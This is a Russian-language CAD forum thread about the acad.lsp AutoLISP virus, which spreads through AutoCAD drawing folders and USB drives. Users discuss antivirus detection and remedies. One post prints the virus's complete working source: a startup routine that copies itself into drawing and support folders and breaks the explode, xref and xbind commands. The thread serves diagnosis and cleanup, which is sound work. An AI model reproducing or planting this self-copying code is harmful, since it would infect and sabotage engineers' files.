[dextron3]

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR

[dextron3]

Если у кого есть возможность протестить данный вирус, или кто уже сталкивался с этим, просьба посочувст... ой поделиться решением проблемы :roll:

[ppv]

А что ты предлагаешь?
Всем, кто не боится, открыть твой архив? При условии, что уже известно что его ловит только последний антивирус.
Спасибо за новость, но проверять ее не буду :roll:

[Alaspher]

Симантек его видит и лечит - ничего страшного (скрипт).
ALS.Bursted.A

[dextron3]

В архиве маленкий ЛИСП файлик просто
поюзать его, если знаешь лисп язык
посмотреть, он сам по себе безобидный
но только с ДВЖ файлами совместно не запускай

[dextron3]

NOD 32 ВИДИТ!

А ПОЧЕМУ КАСПЕРСКИЙ НЕ ЗАМЕЧАЕТ ВОД БЕДА

[DEM]

Ну если все скрипты запускать то вще кердык мона получить.

[Кулик Алексей aka kpblc]

Вот вам несколько вариантов лекарств:
1. Установить системную переменную ACADLSPASDOC в 0
2. В меню исправить вызовы с _xref, _explode, _xbind на _.xref, _.explode, _.xbind соответвенно
3. На кнопку повесить код типа:

Код:

[Выделить все]

^C^C^P(mapcar '(lambda(x) (command "_.redefine" x)) '("xref" "explode" "xbind"));

Скажу честно, работоспособность ни одного из способов не проверял.

[DEM]

kpblc
А ты чего себе интернет установил дома.
ГЫЫ
А ты по пробуй свой код то.

[Pilot]

Цитата:

Здравствуйте! Я - компьютерный вирус. Человек, меня написавший, как программист ничего из себя не представляет, и я не могу нанести вреда Вашему компьютеру. Поэтому, прошу Вас, сами удалите со своего жесткого диска какой-нибудь важный файл, а потом разошлите меня по электронной почте своим друзьям и коллегам.

[Кулик Алексей aka kpblc]

> DEM : Ага, протянул. Правда, скорость хреноватая (немногим быстрее диалапа), но все лучше чем ничего.
Насчет опробовать - вот веришь, не до того!

[Profan]

Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.

[dextron3]

Цитата:

Сообщение от Profan Следует иметь в виду, что этот файл неминуемо запустится, если будет находится в одной папке с открываемым рисунком DWG. Большинство пользователей понятия не имеют о файле acad.lsp и его особых свойствах и получив от сторонней организации набор файлов, содержащий рисунки, шрифты, типы линий, не обращают внимания на еще какой-то непонятный файл. Они не трогают его, а сразу запускают AutoCAD двойным щелчком по имени полученного рисунка. И процесс пошел.

Так еще при запуске он генерирует такой же ЛИСП файл в папке SUPPORT автокада и уже сидит там, как основной вирус, некоторые думают что просто удалил файл acad.lisp с принесенным файлом и все, но нужно проверить ДИСК С, потомучто иногда компьютер еще ранее заражен

[ShaggyDoc]

Цитата:

...во все проектных фирмах все автокадовские файлы заражены вирусом ...

Детские "страшилки" про "зеленую скамеечку" ...

[Кочетков Андрей]

Это не вирус.
Просто кто-то таким образом пытался защитить свои файлы от редактирования и дальнейшего использования )))

[T-Yoke]

Ну вот текст этого файла, и кто скажет, что здесь вредоносного?
------------------------------------------------------------------------------
(defun s::startup(/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq path (findfile "base.dcl"))
(setq path (substr path 1 (- (strlen path)8)))
(setq mnlpath (getvar "menuname"))
(setq nowdwg (getvar "dwgname"))
(setq wjqm (findfile nowdwg))
(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
(setq acadpath (findfile "acad.lsp"))
(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
(setq ns1 "" ns2 "")
(setq lspbj 0)
(setq wjqm (strcat path "acad.lsp"))
(if (setq wjm (open wjqm "r"))
(progn
(while (setq wz (read-line wjm))
(setq ns1 ns2)
(setq ns2 wz)
)
(if (> (strlen ns1) 14)
(if (= (substr ns1 8 7) "acadapp")
(setq lspbj 1)
)
)
(close wjm)
)
)
(if (and (= acadpath dwgpath)
(/= acadpath path))
(progn
(setq oldacad (findfile "acad.lsp"))
(setq newacad (strcat path "acadapp.lsp"))
(if (= lspbj 0)
(progn
(setq wjqm (strcat path "acad.lsp"))
(setq wjm (open wjqm "a"))
(write-line (strcat "(load" (chr 34) "acadapp" (chr 34)")") wjm)
(write-line "(princ)" wjm)
(close wjm)
)
)
(writeapp)
)
(progn
(if (/= nowdwg "Drawing.dwg")
(progn
(setq oldacad (findfile "acadapp.lsp"))
(setq newacad (strcat dwgpath "acad.lsp"))
(writeapp)
)
)
)
)
(command "undefine" "explode")
(command "undefine" "xref")
(command "undefine" "xbind")
(setvar "cmdecho" old_cmd)
(princ)
)
(defun writeapp()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while (setq wz (read-line wjm))
(write-line wz wjm1)
)
(close wjm)
(close wjm1)
)
)
)
(defun C:explode (/ p cont old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq p(ssget))
(if p
(progn
(setq cont (sslength p))
(princ "\nSeltct objects:")
(princ cont)
(princ "found")
(princ "\n")
(princ cont)
(princ "was not able to be explode")
)
)
(setvar "cmdecho" old_cmd)
(princ)
)
(defun C:xref(/ old_cmd)
(setq old_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(command "insert")
(setvar "cmdecho" old_cmd)
(princ)
)
-------------------------------------------------------------------------

[dextron3]

а из за чего тогда антивирь ругаеца

[Кочетков Андрей]

Переопределяются некоторые команды.

[Alaspher]

Цитата:

Сообщение от dextron3 а из за чего тогда антивирь ругаеца

Изза того, что кто-то, совершенно справедливо, пожаловался антивирусникам на зловредный код, а они включили его в свои базы.

[shnn]

2 T-Yoke
вот что:

Код:

[Выделить все]

(command "undefine" "explode") 
(command "undefine" "xref") 
(command "undefine" "xbind")

А вообще считаю что это злая шутка над коллегами случайно вырвалась на свободу за пределы офиса.